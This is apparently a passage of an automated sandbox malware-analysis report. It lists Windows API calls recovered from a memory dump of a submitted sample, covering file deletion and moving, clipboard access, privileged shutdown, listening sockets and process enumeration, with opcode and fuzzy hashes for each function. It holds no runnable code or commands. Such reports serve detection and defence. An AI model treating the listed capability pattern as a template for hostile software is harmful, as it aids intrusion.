                                                              • Opcode Fuzzy Hash: d3e5349aee790b3608b458f8759fd8c0967ee66abb70d8d96c9175df8505b7da
                                                              • Instruction Fuzzy Hash: E661D3716083129FC710EF14C849F9EB7E4AF457A4F44441DF9829B291CB74ED4AEB92
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: f0104d0b9e825978536aa13d2bde841f0bffcb8b464c553b8b5f07988a055dbb
                                                              • Instruction ID: 3bf8c1c0bb65a6c9c9705e070b4893b37c34bd1042417f3955dcd08d03006749
                                                              • Opcode Fuzzy Hash: f0104d0b9e825978536aa13d2bde841f0bffcb8b464c553b8b5f07988a055dbb
                                                              • Instruction Fuzzy Hash: 8821F4356006159FDB01AF64EC09BAD7BA8FF05721F10802AF946DB2B1DB74BC41EB84
                                                              APIs
                                                                • Part of subcall function 00F14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F14743,?,?,00F137AE,?), ref: 00F14770
                                                                • Part of subcall function 00F74A31: GetFileAttributesW.KERNEL32(?,00F7370B), ref: 00F74A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F738A3
                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F7394B
                                                              • MoveFileW.KERNEL32(?,?), ref: 00F7395E
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F7397B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7399D
                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F739B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 4002782344-1173974218
                                                              • Opcode ID: e97a14810f90861810532563098dda95076b8cf77f4140626548912ee634dd7c
                                                              • Instruction ID: 17419631554fcb23ef052fbd1689759b3f325179013b337dae1311fc4a374438
                                                              • Opcode Fuzzy Hash: e97a14810f90861810532563098dda95076b8cf77f4140626548912ee634dd7c
                                                              • Instruction Fuzzy Hash: 21518E3180514CAACF01FBA0DD929EDB779AF14310F60406AE40AB7191EB396F4DFB62
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F7F440
                                                              • Sleep.KERNEL32(0000000A), ref: 00F7F470
                                                              • _wcscmp.LIBCMT ref: 00F7F484
                                                              • _wcscmp.LIBCMT ref: 00F7F49F
                                                              • FindNextFileW.KERNEL32(?,?), ref: 00F7F53D
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F553
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                              • String ID: *.*
                                                              • API String ID: 713712311-438819550
                                                              • Opcode ID: c44393e10bab1309fd5362a117875f2d23a78af1516c696806aabacb4a82dee1
                                                              • Instruction ID: fbed1e5af73495e855d16e8e507a984f2748dbdcb7bd012fd5606504b9aeb3ac
                                                              • Opcode Fuzzy Hash: c44393e10bab1309fd5362a117875f2d23a78af1516c696806aabacb4a82dee1
                                                              • Instruction Fuzzy Hash: 7D416071D0021A9FCF14DF64DC45AEEBBB4FF05324F14846AE819A3191EB349A89EF91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: b3b4143e54b8f702d52612507d35e94c3ca9f544c4c84eeefe8daa578d522267
                                                              • Instruction ID: 5b3106ac447d6b49a40c8c0e1449760147c07f951dec242848df67220f6e0dde
                                                              • Opcode Fuzzy Hash: b3b4143e54b8f702d52612507d35e94c3ca9f544c4c84eeefe8daa578d522267
                                                              • Instruction Fuzzy Hash: 29128A70A00619DFDF04DFA5D981AEEB7F5FF48710F204529E806A7250EB3AAD51EB50
                                                              APIs
                                                                • Part of subcall function 00F14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F14743,?,?,00F137AE,?), ref: 00F14770
                                                                • Part of subcall function 00F74A31: GetFileAttributesW.KERNEL32(?,00F7370B), ref: 00F74A32
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F73B89
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F73BD9
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F73BEA
                                                              • FindClose.KERNEL32(00000000), ref: 00F73C01
                                                              • FindClose.KERNEL32(00000000), ref: 00F73C0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                              • String ID: \*.*
                                                              • API String ID: 2649000838-1173974218
                                                              • Opcode ID: 63a347bd683cca15e4aef475fe2cabeb8f558f85a9457446a2d816e0e9a91c8d
                                                              • Instruction ID: 08dd2a37e7fe463532cbcf69c6305e7f79b9cbbc9270462fa44a1f18b40c7a50
                                                              • Opcode Fuzzy Hash: 63a347bd683cca15e4aef475fe2cabeb8f558f85a9457446a2d816e0e9a91c8d
                                                              • Instruction Fuzzy Hash: 5A316F31408385ABC201EF24DC919EFB7E8AE95314F444D2EF4D992191EB29DA0DFB53
                                                              APIs
                                                                • Part of subcall function 00F687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6882B
                                                                • Part of subcall function 00F687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F68858
                                                                • Part of subcall function 00F687E1: GetLastError.KERNEL32 ref: 00F68865
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00F751F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: fe89fe09fc9005725659454028f243e83b8394d2b05945e9f17491691425ddd5
                                                              • Instruction ID: 9102e473e74bed95b9d7511d023beb91b44e3fc5163043c696a3d4c869a4a796
                                                              • Opcode Fuzzy Hash: fe89fe09fc9005725659454028f243e83b8394d2b05945e9f17491691425ddd5
                                                              • Instruction Fuzzy Hash: 57017B32B916152BF7282368AC8BFBB7258DB04B50F25842BF90FE20D3DAD11C01F192
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 00F862DC
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F862EB
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00F86307
                                                              • listen.WSOCK32(00000000,00000005), ref: 00F86316
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F86330
                                                              • closesocket.WSOCK32(00000000), ref: 00F86344
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: ccac6ce7c0b595f79dc36521d9d12b57bfe6440bff59d6fc49ee0e62135a44d3
                                                              • Instruction ID: 2da63d3854a49e04547d397bafd3b9f766ae750b58e23d4b2809efaf205f669e
                                                              • Opcode Fuzzy Hash: ccac6ce7c0b595f79dc36521d9d12b57bfe6440bff59d6fc49ee0e62135a44d3
                                                              • Instruction Fuzzy Hash: C021D0316002049FCB00FF64CD45BAEB7A9EF49324F244159E816E73D1C774AD45EB51
                                                              APIs
                                                                • Part of subcall function 00F30DB6: std::exception::exception.LIBCMT ref: 00F30DEC
                                                                • Part of subcall function 00F30DB6: __CxxThrowException@8.LIBCMT ref: 00F30E01
                                                              • _memmove.LIBCMT ref: 00F60258
                                                              • _memmove.LIBCMT ref: 00F6036D
                                                              • _memmove.LIBCMT ref: 00F60414
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1300846289-0
                                                              • Opcode ID: c75ada35f71c2cc077eca019661c1856d19faed1affdafac8493c4f7ce7420a8
                                                              • Instruction ID: 0799c45205b353f87bc806b6259d4cfb9d6c243d95442009e9806ff5db1b073c
                                                              • Opcode Fuzzy Hash: c75ada35f71c2cc077eca019661c1856d19faed1affdafac8493c4f7ce7420a8
                                                              • Instruction Fuzzy Hash: C102DF70E00219DBCF04DF64D992AAEBBF5EF44310F248069E80ADB295EF35D950EB91
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F119FA
                                                              • GetSysColor.USER32(0000000F), ref: 00F11A4E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00F11A61
                                                                • Part of subcall function 00F11290: DefDlgProcW.USER32(?,00000020,?), ref: 00F112D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ColorProc$LongWindow
                                                              • String ID:
                                                              • API String ID: 3744519093-0
                                                              • Opcode ID: 312c03a77ac542976e8f3b304e99275961b5acc635b89df1532e058f29b436bc
                                                              • Instruction ID: bb0e4eab4ef9fecf689e86617df0f1beb57abbe782792dd7b541bbde798a5e19
                                                              • Opcode Fuzzy Hash: 312c03a77ac542976e8f3b304e99275961b5acc635b89df1532e058f29b436bc
                                                              • Instruction Fuzzy Hash: 49A1187250654ABAEB28AB295C44EFF3D5DFF41361B14011AFB02D5192CA2EDD81B2F1
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F7BCE6
                                                              • _wcscmp.LIBCMT ref: 00F7BD16
                                                              • _wcscmp.LIBCMT ref: 00F7BD2B
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00F7BD3C
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F7BD6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: 615d6deb69cca67766b6cc9e657def35ee8370359fdcf0d0ca90173d611cab2c
                                                              • Instruction ID: 2dfa78f25c5173ce7c54a8583ce6e2e639a77fded8fbfaa39b85431f26129267
                                                              • Opcode Fuzzy Hash: 615d6deb69cca67766b6cc9e657def35ee8370359fdcf0d0ca90173d611cab2c
                                                              • Instruction Fuzzy Hash: 99518135A046029FD724DF68C891E9AB3E4EF4A320F14851EF95987361DB34ED05DB92
                                                              APIs
                                                                • Part of subcall function 00F87D8B: inet_addr.WSOCK32(00000000), ref: 00F87DB6
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00F8679E
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F867C7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00F86800
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F8680D
                                                              • closesocket.WSOCK32(00000000), ref: 00F86821
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 99427753-0
                                                              • Opcode ID: 8ac9cc63d4c126311fa9a7ecfa15349aae494256ad43b40097bd90ff25d7528c
                                                              • Instruction ID: 842c48d3f2953bc170d700c9ffb1b2952df8914e2a37966cdcd3126405a015dc
                                                              • Opcode Fuzzy Hash: 8ac9cc63d4c126311fa9a7ecfa15349aae494256ad43b40097bd90ff25d7528c
                                                              • Instruction Fuzzy Hash: CF41C375A002046FDB10BF648C96FAE77A89F05764F44845CF915EB3C2CA789D41AB91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 13b0eac89f7f3a16716c4770f470b91716607f88813c9ac9c1353f78dbd2f28f
                                                              • Instruction ID: 8e3bcc1ccc846b87e46bd25523230ffa9af5f533fb4fbfe769a0767f29a1711c
                                                              • Opcode Fuzzy Hash: 13b0eac89f7f3a16716c4770f470b91716607f88813c9ac9c1353f78dbd2f28f
                                                              • Instruction Fuzzy Hash: 2711E2317009146BEF225F269C44E6A7B99EF45BB0B444029F846D3241CBB4DC02ABA0
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F680C0
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F680CA
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F680D9
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F680E0
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F680F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: bc7d4c91e9022a5881d242d0d4fba818de56c6234c360f7230e38b0db05464c1
                                                              • Instruction ID: f2c8a64ebe8c6909686c772472d4a186222b4af1c689b2fc89046589b03881d5
                                                              • Opcode Fuzzy Hash: bc7d4c91e9022a5881d242d0d4fba818de56c6234c360f7230e38b0db05464c1
                                                              • Instruction Fuzzy Hash: 57F06831640208BFDB100F65DC8DE673BACEF467A5B10012AF545C6160CF619C47EA60
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00F14AD0), ref: 00F14B45
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F14B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 93eeaad672355af895b3e89a335de1468b4f54474d78319f2bf97dd5e44e6f38
                                                              • Instruction ID: 5560ac9c6dfa8097d8c45abdd4a7a3126009853112c992938954d9b6883d66c7
                                                              • Opcode Fuzzy Hash: 93eeaad672355af895b3e89a335de1468b4f54474d78319f2bf97dd5e44e6f38
                                                              • Instruction Fuzzy Hash: 0DD01274E10717CFDB20DF31E818B4676E4AF85355B15883A9485D6150D670E4C4EA55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: eb09479f483868d03f44104097ccf98fd62056d203b9d6f925efc7a232083458
                                                              • Instruction ID: e4d197dbce1c4d60d1181eca6419eeac08f96abd51d4b7b8c1ed5f991d811d34
                                                              • Opcode Fuzzy Hash: eb09479f483868d03f44104097ccf98fd62056d203b9d6f925efc7a232083458
                                                              • Instruction Fuzzy Hash: 5422D171A083109FC724DF14D891BAFB7E4AF84710F40491DF99A97281DB79EE48EB92
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00F8EE3D
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00F8EE4B
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00F8EF0B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F8EF1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                              • String ID:
                                                              • API String ID: 2576544623-0
                                                              • Opcode ID: 5c629ad4957add2e37f4c9d3673c47e832ebd624338ed106ce3c9fbc843c9d3b
                                                              • Instruction ID: 42d1eccfc62f5034b7726bd0e89029ad8009f08519c420a753fb36d1978854cf
